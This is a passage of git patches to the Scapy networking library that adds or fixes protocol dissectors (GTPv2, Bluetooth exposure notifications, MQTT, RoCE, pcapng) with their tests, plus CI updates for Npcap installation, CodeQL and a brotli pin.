error-2 * Change extension and timestamp to lowercase * Update gtp_v2.uts * Fix apco test --- scapy/contrib/gtp_v2.py | 33 +++++++++++++++++++++++++++++---- test/contrib/gtp_v2.uts | 30 +++++++++++++++++++++++------- 2 files changed, 52 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index fb76dada861..520034862fa 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -240,6 +240,8 @@ 136: "FQDN", 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", + 163: "Additional Protocol Configuration Options", + 170: "ULI Timestamp", 172: "RAN/NAS Cause", 197: "Extended Protocol Configuration Options", 202: "UP Function Selection Indication Flags", @@ -444,6 +446,16 @@ class IE_ULI(gtp.IE_Base): ] +class IE_ULI_Timestamp(gtp.IE_Base): + name = "IE ULI Timestamp" + fields_desc = [ + ByteEnumField("ietype", 170, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + XIntField("timestamp", 0)] + + # 3GPP TS 29.274 v12.12.0 section 8.22 INTERFACE_TYPES = { 0: "S1-U eNodeB GTP-U interface", @@ -1291,6 +1303,19 @@ class IE_EPCO(gtp.IE_Base): length_from=lambda pkt: pkt.length - 1)] +class IE_APCO(gtp.IE_Base): + name = "IE Additional Protocol Configuration Options" + fields_desc = [ByteEnumField("ietype", 163, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("extension", 0, 1), + BitField("SPARE", 0, 4), + BitField("PPP", 0, 3), + PacketListField("Protocols", None, PCO_protocol_dispatcher, + length_from=lambda pkt: pkt.length - 1)] + + class IE_PAA(gtp.IE_Base): name = "IE PAA" fields_desc = [ByteEnumField("ietype", 79, IEType), @@ -1454,10 +1479,8 @@ class IE_PrivateExtension(gtp.IE_Base): BitField("SPARE", 0, 4), BitField("instance", 0, 4), ShortEnumField("enterprisenum", None, IANA_ENTERPRISE_NUMBERS), - ] - - def extract_padding(self, s): - return s[:self.length], '' + StrLenField("proprietaryvalue", "", + length_from=lambda x: x.length - 2)] ietypecls = {1: IE_IMSI, @@ -1493,6 +1516,8 @@ def extract_padding(self, s): 136: IE_FQDN, 145: IE_UCI, 161: IE_MMBR, + 163: IE_APCO, + 170: IE_ULI_Timestamp, 172: IE_Ran_Nas_Cause, 197: IE_EPCO, 202: IE_UPF_SelInd_Flags, diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 328ec23fe5f..97685464a20 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -175,6 +175,16 @@ ie.Protocols[0].type == 27 ie = IE_EPCO(Protocols=[PCO_S_Nssai(type=27, length=0)], ietype=197, length=4, CR_flag=0, instance=0, Extension=1, SPARE=0, PPP=0) ie.Extension == 1 and ie.ietype == 197 and ie.Protocols[0].type == 27 and ie.Protocols[0].length == 0 += IE_APCO, dissection +h = "d89ef3da40e2fa163e956dce0800450000360001000040115d650a0f0f3d01020304084b084b00220000482000160000000100000100a3000a0080000c00001200000d00" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.Protocols[0].type == 12 and ie.Protocols[1].type == 18 and ie.Protocols[2].type == 13 + += IE_APCO, basic instantiation +ie = IE_APCO(Protocols=[PCO_P_CSCF_IPv4_Address_Request(address=None, type=12, length=0),PCO_P_CSCF_Re_selection_Support(type=18, length=0),PCO_DNS_Server_IPv4(address=None, type=13, length=0)], ietype=163, length=10, CR_flag=0, instance=0, extension=1, SPARE=0, PPP=0) +ie.extension == 1 and ie.ietype == 163 and ie.length == 10 and ie.Protocols[0].type == 12 and ie.Protocols[1].type == 18 and ie.Protocols[2].type == 13 + = IE_MMContext_EPS, dissection h = "d89ef3da40e2fa163e956dce08004500007f0001000040114bbd0a0a0f3d0a0f0b5b084b084b006b5a234883005f0000180f76d163006b0046008800910000020000021890aa80be385102083701a2907066f8bd9f2a28b717671c71c71c71c71c71c70100003d090002625a00028040000812345678900000000000000000006d000900880005000470677731" gtp = Ether(hex_bytes(h)) @@ -440,10 +450,16 @@ gtp = Ether(hex_bytes(h)) isinstance(gtp.IE_list[0], IE_NotImplementedTLV) isinstance(gtp.IE_list[0].payload, NoPayload) -= IE_PrivateExtension -h = "5001003500303900ff0031002b79deadbeef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef12345678" -gtp = GTPHeader(hex_bytes(h)) -gtp.show2() -(ie,) = gtp.IE_list -ie.enterprisenum == 11129 -bytes_hex(ie.payload) == b"deadbeef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef12345678" += IE_PrivateExtension, dissection +h = "d89ef3da40e2fa163e956dce08004500005b0001000040115d400a0f0f3d01020304084b084b00470000482000620000000100000100ff0015000137020046462d46462d46462d46462d46462d4646ff00160001370100000100000000000000000000000000000000" +gtp = Ether(hex_bytes(h)) +ie1 = gtp.IE_list[0] +ie2 = gtp.IE_list[1] +ie1.enterprisenum == 311 and bytes_hex(ie1.proprietaryvalue) == b'020046462d46462d46462d46462d46462d4646' +ie2.enterprisenum == 311 and bytes_hex(ie2.proprietaryvalue) == b'0100000100000000000000000000000000000000' + += IE_PrivateExtension, basic instantiation +ie1 = IE_PrivateExtension(ietype=255, length=21, SPARE=0, instance=0, enterprisenum=311, proprietaryvalue=hex_bytes('020046462d46462d46462d46462d46462d4646')) +ie2 = IE_PrivateExtension(ietype=255, length=22, SPARE=0, instance=0, enterprisenum=311, proprietaryvalue=hex_bytes('0100000100000000000000000000000000000000')) +ie1.enterprisenum == 311 and bytes_hex(ie1.proprietaryvalue) == b'020046462d46462d46462d46462d46462d4646' +ie2.enterprisenum == 311 and bytes_hex(ie2.proprietaryvalue) == b'0100000100000000000000000000000000000000' From 86b1ee3472c7494a3da0b5255dd7cdb5a99f0089 Mon Sep 17 00:00:00 2001 From: Michael Farrell Date: Mon, 24 Aug 2020 13:42:13 +1000 Subject: [PATCH 0256/1632] Add: Apple/Google BLE Exposure Notification Service (v1.2) --- scapy/contrib/exposure_notification.py | 68 ++++++++++++++++++++++++++ test/contrib/exposure_notification.uts | 59 ++++++++++++++++++++++ 2 files changed, 127 insertions(+) create mode 100644 scapy/contrib/exposure_notification.py create mode 100644 test/contrib/exposure_notification.uts diff --git a/scapy/contrib/exposure_notification.py b/scapy/contrib/exposure_notification.py new file mode 100644 index 00000000000..17d24a598a2 --- /dev/null +++ b/scapy/contrib/exposure_notification.py @@ -0,0 +1,68 @@ +# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- +# exposure_notification.py - Apple/Google Exposure Notification System +# +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) 2020 Michael Farrell +# This program is published under a GPLv2 (or later) license +# +# scapy.contrib.description = Apple/Google Exposure Notification System (ENS) +# scapy.contrib.status = loads +""" +Apple/Google Exposure Notification System (ENS), formerly known as +Privacy-Preserving Contact Tracing Project. + +This module parses the Bluetooth Low Energy beacon payloads used by the system. +This does **not** yet implement any cryptographic functionality. + +More info: + +* `Apple: Privacy-Preserving Contact Tracing`__ +* `Google: Exposure Notifications`__ +* `Wikipedia: Exposure Notification`__ + +__ https://www.apple.com/covid19/contacttracing/ +__ https://www.google.com/covid19/exposurenotifications/ +__ https://en.wikipedia.org/wiki/Exposure_Notification + +Bluetooth protocol specifications: + +* `v1.1`_ (April 2020) +* `v1.2`_ (April 2020) + +.. _v1.1: https://blog.google/documents/58/Contact_Tracing_-_Bluetooth_Specification_v1.1_RYGZbKW.pdf +.. _v1.2: https://covid19-static.cdn-apple.com/applications/covid19/current/static/contact-tracing/pdf/ExposureNotification-BluetoothSpecificationv1.2.pdf +""" # noqa: E501 + +from scapy.fields import StrFixedLenField +from scapy.layers.bluetooth import EIR_Hdr, EIR_ServiceData16BitUUID, \ + EIR_CompleteList16BitServiceUUIDs, LowEnergyBeaconHelper +from scapy.packet import bind_layers, Packet + + +EXPOSURE_NOTIFICATION_UUID = 0xFD6F + + +class Exposure_Notification_Frame(Packet, LowEnergyBeaconHelper): + """Apple/Google BLE Exposure Notification broadcast frame.""" + name = "Exposure Notification broadcast" + + fields_desc = [ + # Rolling Proximity Identifier + StrFixedLenField("identifier", None, 16), + # Associated Encrypted Metadata (added in v1.2) + StrFixedLenField("metadata", None, 4), + ] + + def build_eir(self): + """Builds a list of EIR messages to wrap this frame.""" + + return LowEnergyBeaconHelper.base_eir + [ + EIR_Hdr() / EIR_CompleteList16BitServiceUUIDs(svc_uuids=[ + EXPOSURE_NOTIFICATION_UUID]), + EIR_Hdr() / EIR_ServiceData16BitUUID() / self + ] + + +bind_layers(EIR_ServiceData16BitUUID, Exposure_Notification_Frame, + svc_uuid=EXPOSURE_NOTIFICATION_UUID) diff --git a/test/contrib/exposure_notification.uts b/test/contrib/exposure_notification.uts new file mode 100644 index 00000000000..7930c530dde --- /dev/null +++ b/test/contrib/exposure_notification.uts @@ -0,0 +1,59 @@ +% Exposure Notification System tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('exposure_notification')" -t test/contrib/exposure_notification.uts + ++ ENS tests + += Setup + +def next_eir(p): + return EIR_Hdr(p[Padding].load) + += Presence check + +Exposure_Notification_Frame + += Raw payload copied from BluetoothExplorer.app + +d = hex_bytes('17df1d67405e3395470e62ca4fda6a9303687b31') +p = Exposure_Notification_Frame(d) + +assert p.identifier == hex_bytes('17df1d67405e3395470e62ca4fda6a93') +assert p.metadata == hex_bytes('03687b31') + += Raw captured payload + +d = hex_bytes('02011a03036ffd17166ffde23f352fa09307a85d4194912443180d484dc151') +p = EIR_Hdr(d) + +# First is a flags header +assert EIR_Flags in p + +# Then the 16-bit Service Class ID +p = next_eir(p) +assert p[EIR_CompleteList16BitServiceUUIDs].svc_uuids == [ + EXPOSURE_NOTIFICATION_UUID] + +# Then the ENS +p = next_eir(p) +assert p[EIR_ServiceData16BitUUID].svc_uuid == EXPOSURE_NOTIFICATION_UUID +assert p[Exposure_Notification_Frame].identifier == hex_bytes( + 'e23f352fa09307a85d4194912443180d') +assert p[Exposure_Notification_Frame].metadata == hex_bytes('484dc151') + +# Rebuild the payload. +p2 = p[Exposure_Notification_Frame].build_eir() + +# Our captured payload was from a mobile phone, but build_eir presumes that +# we're broadcasting as an non-connectable, LE-only beacon. We need to adjust +# these flags to match the captured packet. +p2[0] = EIR_Hdr() / EIR_Flags(flags=[ + 'general_disc_mode', 'simul_le_br_edr_ctrl', 'simul_le_br_edr_host']) + +# Ensure we didn't mutate LowEnergyBeaconHelper.base_eir just then. +assert LowEnergyBeaconHelper.base_eir[0][EIR_Flags].flags == [ + 'general_disc_mode', 'br_edr_not_supported'] + +# Assemble all packet bytes +assert b''.join(map(raw, p2)) == d From 0f9baef2e33a1901f9211896cb30e972074e7774 Mon Sep 17 00:00:00 2001 From: "Alexander V. Chernikov" Date: Sun, 23 Aug 2020 11:21:04 +0000 Subject: [PATCH 0257/1632] Fix scapy init on FreeBSD. - Read ipv4 table in read_routes() instead of all, fixing IPv6-only setups. - Address FreeBSD 13 netstat -rnW output change by skipping "nhop" column. --- scapy/arch/unix.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index e849555f0b8..139491266ab 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -49,7 +49,7 @@ def read_routes(): if SOLARIS: f = os.popen("netstat -rvn -f inet") elif FREEBSD: - f = os.popen("netstat -rnW") # -W to handle long interface names + f = os.popen("netstat -rnW -f inet") # -W to show long interface names else: f = os.popen("netstat -rn -f inet") ok = 0 @@ -71,7 +71,7 @@ def read_routes(): mtu_present = "mtu" in line prio_present = "prio" in line refs_present = "ref" in line # There is no s on Solaris - use_present = "use" in line + use_present = "use" in line or "nhop" in line continue if not line: break From f74145ae63f774a0a7b44154e10c6bea0f667905 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 25 Aug 2020 15:21:55 +0200 Subject: [PATCH 0258/1632] Mock read_routes() on FreeBSD 13.0 --- test/regression.uts | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/test/regression.uts b/test/regression.uts index 356bfa26d75..bed1e8141f1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8928,6 +8928,44 @@ ff02::%lo0/32 ::1 U lo0 test_freebsd_10_2() += FreeBSD 13.0 +~ mock_read_routes_bsd + +import mock +from io import StringIO + +@mock.patch("scapy.arch.unix.os") +def test_freebsd_13(mock_os): + """Test read_routes() on FreeBSD 13""" + # 'netstat -rnW -f inet' output + netstat_output = u""" +Routing tables + +Internet: +Destination Gateway Flags Nhop# Mtu Netif Expire +default 10.0.0.1 UGS 3 1500 vtnet0 +10.0.0.0/24 link#1 U 2 1500 vtnet0 +10.0.0.8 link#2 UHS 1 16384 lo0 +127.0.0.1 link#2 UH 1 16384 lo0 +""" + # Mocked file descriptor + strio = StringIO(netstat_output) + mock_os.popen = mock.MagicMock(return_value=strio) + # Test the function + from scapy.arch.unix import read_routes + routes = read_routes() + scapy.arch.unix.DARWIN = False + scapy.arch.unix.FREEBSD = True + scapy.arch.unix.NETBSD = False + scapy.arch.unix.OPENBSD = False + for r in routes: + print(r) + assert(r[3] in ["vtnet0", "lo0"]) + assert(len(routes) == 4) + +test_freebsd_13() + + = OpenBSD 5.5 ~ mock_read_routes_bsd From 6c59eef305ae09f7f9086819e78ed5a979c650b7 Mon Sep 17 00:00:00 2001 From: luisgar1990 <34185943+luisgar1990@users.noreply.github.com> Date: Sun, 30 Aug 2020 19:01:09 -0300 Subject: [PATCH 0259/1632] MQTTSubscribe now supports multiple topic subscriptions in the payload. (#2759) --- scapy/contrib/mqtt.py | 43 +++++++++++++++++------------------------- test/contrib/mqtt.uts | 44 +++++++++++++++++++++++++++++++++++-------- 2 files changed, 53 insertions(+), 34 deletions(-) diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index f66a5a8bb88..204fec3e747 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -220,14 +220,26 @@ class MQTTPubcomp(Packet): ] +class MQTTTopic(Packet): + name = "MQTT topic" + fields_desc = [ + FieldLenField("length", None, length_of="topic"), + StrLenField("topic", "", length_from=lambda pkt:pkt.length) + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class MQTTTopicQOS(MQTTTopic): + fields_desc = MQTTTopic.fields_desc + [ByteEnumField("QOS", 0, QOS_LEVEL)] + + class MQTTSubscribe(Packet): name = "MQTT subscribe" fields_desc = [ ShortField("msgid", None), - FieldLenField("length", None, length_of="topic"), - StrLenField("topic", "", - length_from=lambda pkt: pkt.length), - ByteEnumField("QOS", 0, QOS_LEVEL), + PacketListField("topics", [], cls=MQTTTopicQOS) ] @@ -247,32 +259,11 @@ class MQTTSuback(Packet): ] -class MQTTTopic(Packet): - name = "MQTT topic" - fields_desc = [ - FieldLenField("len", None, length_of="topic"), - StrLenField("topic", "", length_from=lambda pkt:pkt.len) - ] - - def guess_payload_class(self, payload): - return conf.padding_layer - - -def cb_topic(pkt, lst, cur, remain): - """ - Decode the remaining bytes as a MQTT topic - """ - if len(remain) > 3: - return MQTTTopic - else: - return conf.raw_layer - - class MQTTUnsubscribe(Packet): name = "MQTT unsubscribe" fields_desc = [ ShortField("msgid", None), - PacketListField("topics", [], next_cls_cb=cb_topic) + PacketListField("topics", [], cls=MQTTTopic) ] diff --git a/test/contrib/mqtt.uts b/test/contrib/mqtt.uts index 9371d020ec9..ac73f712261 100644 --- a/test/contrib/mqtt.uts +++ b/test/contrib/mqtt.uts @@ -70,20 +70,20 @@ assert(connack.retcode == 0) = MQTTSubscribe, packet instantiation -sb = MQTT()/MQTTSubscribe(msgid=1,topic='newtopic',QOS=0,length=0) +sb = MQTT()/MQTTSubscribe(msgid=1, topics=[MQTTTopicQOS(topic='newtopic', QOS=1, length=0)]) assert(sb.type == 8) assert(sb.msgid == 1) -assert(sb.topic == b'newtopic') -assert(sb.length == 0) -assert(sb[MQTTSubscribe].QOS == 0) +assert(sb.topics[0].topic == b'newtopic') +assert(sb.topics[0].length == 0) +assert(sb[MQTTSubscribe][MQTTTopicQOS].QOS == 1) = MQTTSubscribe, packet dissection -s = b'\x82\t\x00\x01\x00\x04test\x00' +s = b'\x82\t\x00\x01\x00\x04test\x01' subscribe = MQTT(s) assert(subscribe.msgid == 1) -assert(subscribe.length == 4) -assert(subscribe.topic == b'test') -assert(subscribe.QOS == 1) +assert(subscribe.topics[0].length == 4) +assert(subscribe.topics[0].topic == b'test') +assert(subscribe.topics[0].QOS == 1) = MQTTSuback, packet instantiation @@ -98,6 +98,30 @@ suback = MQTT(s) assert(suback.msgid == 1) assert(suback.retcode == 0) += MQTTUnsubscribe, packet instantiation +unsb = MQTT()/MQTTUnsubscribe(msgid=1, topics=[MQTTTopic(topic='newtopic',length=0)]) +assert(unsb.type == 10) +assert(unsb.msgid == 1) +assert(unsb.topics[0].topic == b'newtopic') +assert(unsb.topics[0].length == 0) + += MQTTUnsubscribe, packet dissection +u = b'\xA2\x09\x00\x01\x00\x03\x61\x2F\x62' +unsubscribe = MQTT(u) +assert(unsubscribe.msgid == 1) +assert(unsubscribe.topics[0].length == 3) +assert(unsubscribe.topics[0].topic == b'a/b') + += MQTTUnsuback, packet instantiation +unsk = MQTT()/MQTTUnsuback(msgid=1) +assert(unsk.type == 11) +assert(unsk.msgid == 1) + += MQTTUnsuback, packet dissection +u = b'\xb0\x02\x00\x01' +unsuback = MQTT(u) +assert(unsuback.type == 11) +assert(unsuback.msgid == 1) = MQTTPubrec, packet instantiation pc = MQTT()/MQTTPubrec(msgid=1) @@ -129,3 +153,7 @@ assert(type(MQTT().fieldtype['len'].randval() + 0) == int) = MQTTUnsubscribe u = MQTT(b'\xA2\x0C\x00\x01\x00\x03\x61\x2F\x62\x00\x03\x63\x2F\x64') assert MQTTUnsubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" + += MQTTSubscribe +u = MQTT(b'\x82\x10\x00\x01\x00\x03\x61\x2F\x62\x02\x00\x03\x63\x2F\x64\x00') +assert MQTTSubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" From 23b5af325f6811375028a552437c4f128b73535d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 1 Sep 2020 10:01:06 +0200 Subject: [PATCH 0260/1632] Stop processing a pcapng file when a block is malformed --- scapy/utils.py | 1 + test/regression.uts | 6 ++++++ 2 files changed, 7 insertions(+) diff --git a/scapy/utils.py b/scapy/utils.py index 32c0b63b23d..2c0ecce5ebe 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1234,6 +1234,7 @@ def read_packet(self, size=MTU): if (blocklen,) != struct.unpack(self.endian + 'I', self.f.read(4)): warning("PcapNg: Invalid pcapng block (bad blocklen)") + raise EOFError except struct.error: raise EOFError res = self.blocktypes.get(blocktype, diff --git a/test/regression.uts b/test/regression.uts index bed1e8141f1..f7893c78663 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7269,6 +7269,12 @@ assert isinstance(pkt, Padding) and pkt.load == b'\xeay$\xf6' pkt = pkt.payload assert isinstance(pkt, NoPayload) += Invalid pcapng file + +from io import BytesIO +invalid_pcapngfile = BytesIO(b'\n\r\r\n\r\x00\x00\x00M<+\x1a\xb2<\xb2\xa1\x01\x00\x00\x00\r\x00\x00\x00M<+\x1a\x80\xaa\xb2\x02') +assert(len(rdpcap(invalid_pcapngfile)) == 0) + = Check PcapWriter on null write f = BytesIO() From df769a349ff3ddd4a210fb8f99e74115a3922d12 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 1 Sep 2020 15:02:09 +0000 Subject: [PATCH 0261/1632] Pin brotli version --- test/regression.uts | 1 + tox.ini | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index 356bfa26d75..6f389a341e1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7682,6 +7682,7 @@ assert HTTPResponse in pkts[2] assert pkts[2].load == b'' = HTTP decompression (brotli) +~ brotli conf.debug_dissector = True load_layer("http") diff --git a/tox.ini b/tox.ini index 62bc20b0f60..ff7e5769750 100644 --- a/tox.ini +++ b/tox.ini @@ -22,7 +22,7 @@ deps = mock cryptography coverage python-can - brotli + brotli<1.0.8 platform = linux_non_root,linux_root: linux bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd From 8646a86fedd7cbe7cc05bf779070babd93c49c9a Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 1 Sep 2020 18:03:52 +0200 Subject: [PATCH 0262/1632] Update npcap install script - update to new version - hide the red error text when the key is not detected --- .config/appveyor/InstallNpcap.ps1 | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index 23d774bbc91..c2435e7d757 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -1,7 +1,7 @@ # Install Npcap on the machine. # Config: -$npcap_oem_file = "npcap-0.99-r9-oem.exe" +$npcap_oem_file = "npcap-0.9997-oem.exe" # Note: because we need the /S option (silent), this script has two cases: # - The script is runned from a master build, then use the secure variable 'npcap_oem_key' which will be available @@ -9,9 +9,9 @@ $npcap_oem_file = "npcap-0.99-r9-oem.exe" # - The script is runned from a PR, then use the provided archived 0.96 version, which is the last public one to # provide support for the /S option -Try -{ - # Check that the key is defined (build mode) +if (Test-Path Env:npcap_oem_key){ # Key is here: on master + echo "Using Npcap OEM version" + # Unpack the key $user, $pass = (Get-ChildItem Env:npcap_oem_key).Value.replace("`"", "").split(",") if(!$user -Or !$pass){ Throw (New-Object System.Exception) @@ -25,9 +25,8 @@ Try $secpasswd = ConvertTo-SecureString $pass -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential($user, $secpasswd) Invoke-WebRequest -uri (-join("https://nmap.org/npcap/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential -} -Catch -{ +} else { # No key: PRs + echo "Using backup 0.96" $file = $PSScriptRoot+"\npcap-0.96.exe" # Download the 0.96 file from nmap servers wget "https://nmap.org/npcap/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file @@ -40,9 +39,10 @@ Catch echo "Checksums matches !" } } -echo "Installing:" -echo $file +echo ('Installing: ' + $file) # Run installer Start-Process $file -ArgumentList "/loopback_support=yes /S" -wait -echo "Npcap installation completed" +if($?) { + echo "Npcap installation completed" +} From c66d201c76cbdfc8a57bc6184a99dbdc1fbfa6db Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 3 Sep 2020 09:33:47 +0200 Subject: [PATCH 0263/1632] CodeQL support --- .github/workflows/codeql-analysis.yml | 62 +++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 .github/workflows/codeql-analysis.yml diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml new file mode 100644 index 00000000000..e74db5df1d7 --- /dev/null +++ b/.github/workflows/codeql-analysis.yml @@ -0,0 +1,62 @@ +name: "CodeQL" + +on: + push: + branches: [master] + pull_request: + # The branches below must be a subset of the branches above + branches: [master] + schedule: + - cron: '0 0 * * 1' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + + strategy: + fail-fast: false + matrix: + # Override automatic language detection by changing the below list + # Supported options are ['csharp', 'cpp', 'go', 'java', 'javascript', 'python'] + language: ['python'] + # Learn more... + # https://docs.github.com/en/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#overriding-automatic-language-detection + + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + # We must fetch at least the immediate parents so that if this is + # a pull request then we can checkout the head. + fetch-depth: 2 + + # If this run was triggered by a pull request event, then checkout + # the head of the pull request instead of the merge commit. + - run: git checkout HEAD^2 + if: ${{ github.event_name == 'pull_request' }} + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v1 + with: + languages: ${{ matrix.language }} + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v1 + + # ℹ️ Command-line programs to run using the OS shell. + # 📚 https://git.io/JvXDl + + # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v1 From a17a5288ce5593a8773bd02a40bfaa18103b2498 Mon Sep 17 00:00:00 2001 From: Elias Boutaleb Date: Tue, 1 Sep 2020 11:37:47 +0200 Subject: [PATCH 0264/1632] Add RoCE GRH packet format --- scapy/contrib/roce.py | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index 01fcf709154..6b77a299eb6 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -11,9 +11,10 @@ """ from scapy.packet import Packet, bind_layers, Raw -from scapy.fields import ByteEnumField, XShortField, \ - XLongField, BitField, FCSField +from scapy.fields import ByteEnumField, ByteField, XByteField, \ + ShortField, XShortField, XLongField, BitField, XBitField, FCSField from scapy.layers.inet import IP, UDP +from scapy.layers.l2 import Ether from scapy.compat import raw from scapy.error import warning from zlib import crc32 @@ -199,6 +200,21 @@ def cnp(dqpn): return BTH(opcode=CNP_OPCODE, becn=1, dqpn=dqpn) / CNPPadding() +class GRH(Packet): + name = "GRH" + fields_desc = [ + BitField("ipver", 6, 4), + BitField("tclass", 0, 8), + BitField("flowlabel", 6, 20), + ShortField("paylen", 0), + ByteField("nexthdr", 0), + ByteField("hoplmt", 0), + XBitField("sgid", 0, 128), + XBitField("dgid", 0, 128), + ] + bind_layers(BTH, CNPPadding, opcode=CNP_OPCODE) +bind_layers(Ether, GRH, type=0x8915) +bind_layers(GRH, BTH) bind_layers(UDP, BTH, dport=4791) From 839e353697710480d0e03948a27b2dd10fb959cf Mon Sep 17 00:00:00 2001 From: Elias Boutaleb Date: Tue, 1 Sep 2020 11:38:15 +0200 Subject: [PATCH 0265/1632] Add RoCE AETH packet format --- scapy/contrib/roce.py | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index 6b77a299eb6..091fa363346 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -213,8 +213,19 @@ class GRH(Packet): XBitField("dgid", 0, 128), ] + +class AETH(Packet): + name = "AETH" + fields_desc = [ + XByteField("syndrome", 0), + XBitField("msn", 0, 24), + ] + + bind_layers(BTH, CNPPadding, opcode=CNP_OPCODE) bind_layers(Ether, GRH, type=0x8915) bind_layers(GRH, BTH) +bind_layers(BTH, AETH, opcode=opcode('RC', 'ACKNOWLEDGE')[0]) +bind_layers(BTH, AETH, opcode=opcode('RD', 'ACKNOWLEDGE')[0]) bind_layers(UDP, BTH, dport=4791) From d20e6677e9a03406e44b709e7aa6808cd2e8afbe Mon Sep 17 00:00:00 2001 From: Elias Boutaleb Date: Wed, 2 Sep 2020 11:48:18 +0200 Subject: [PATCH 0266/1632] Add RoCE v1 unittests for GRH and AETH headers --- test/contrib/roce.uts | 47 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) diff --git a/test/contrib/roce.uts b/test/contrib/roce.uts index 3275d8db206..757163d3049 100644 --- a/test/contrib/roce.uts +++ b/test/contrib/roce.uts @@ -77,3 +77,50 @@ del pkt.icrc pkt = Ether(pkt.build()) assert pkt.icrc == 0x82fd002a += RoCE v1 RC RDMA WRITE ONLY + +pkt = Ether(import_hexcap('''\ +0x0000 7c fe 90 75 3c d8 7c fe 90 75 3c d8 89 15 60 20 +0x0010 00 00 00 28 1b 40 00 00 00 00 00 00 00 00 00 00 +0x0020 ff ff 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 +0x0030 ff ff 0f 00 00 02 0a 70 ff ff 00 00 01 0a 80 a7 +0x0040 88 bc 00 00 55 d4 c0 72 60 00 00 00 47 b3 00 00 +0x0050 00 05 00 00 00 00 01 00 00 00 e3 d8 56 bb +''')) + +assert GRH in pkt.layers() +assert BTH in pkt.layers() +assert pkt[GRH].ipver == 6 +assert pkt[GRH].tclass == 2 +assert pkt[GRH].flowlabel == 0 +assert pkt[GRH].paylen == 40 +assert pkt[BTH].opcode == 0xa +assert pkt[BTH].padcount == 3 +assert pkt[BTH].dqpn == 0x10a +assert pkt[BTH].ackreq +assert pkt.icrc == 0xe3d856bb + += RoCE v1 RC ACKNOWLEDGE + +pkt = Ether(import_hexcap('''\ +0000 7c fe 90 75 3c d8 7c fe 90 75 3c d8 89 15 60 20 +0010 00 00 00 14 1b 40 00 00 00 00 00 00 00 00 00 00 +0020 ff ff 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 +0030 ff ff 0f 00 00 02 11 40 ff ff 00 00 01 09 00 a7 +0040 88 c0 00 00 00 05 25 f0 c0 38 +''')) + +assert GRH in pkt.layers() +assert BTH in pkt.layers() +assert AETH in pkt.layers() +assert pkt[GRH].ipver == 6 +assert pkt[GRH].tclass == 2 +assert pkt[GRH].flowlabel == 0 +assert pkt[GRH].paylen == 20 +assert pkt[BTH].opcode == 0x11 +assert pkt[BTH].padcount == 0 +assert pkt[BTH].dqpn == 0x109 +assert not pkt[BTH].ackreq +assert pkt[AETH].syndrome == 0 +assert 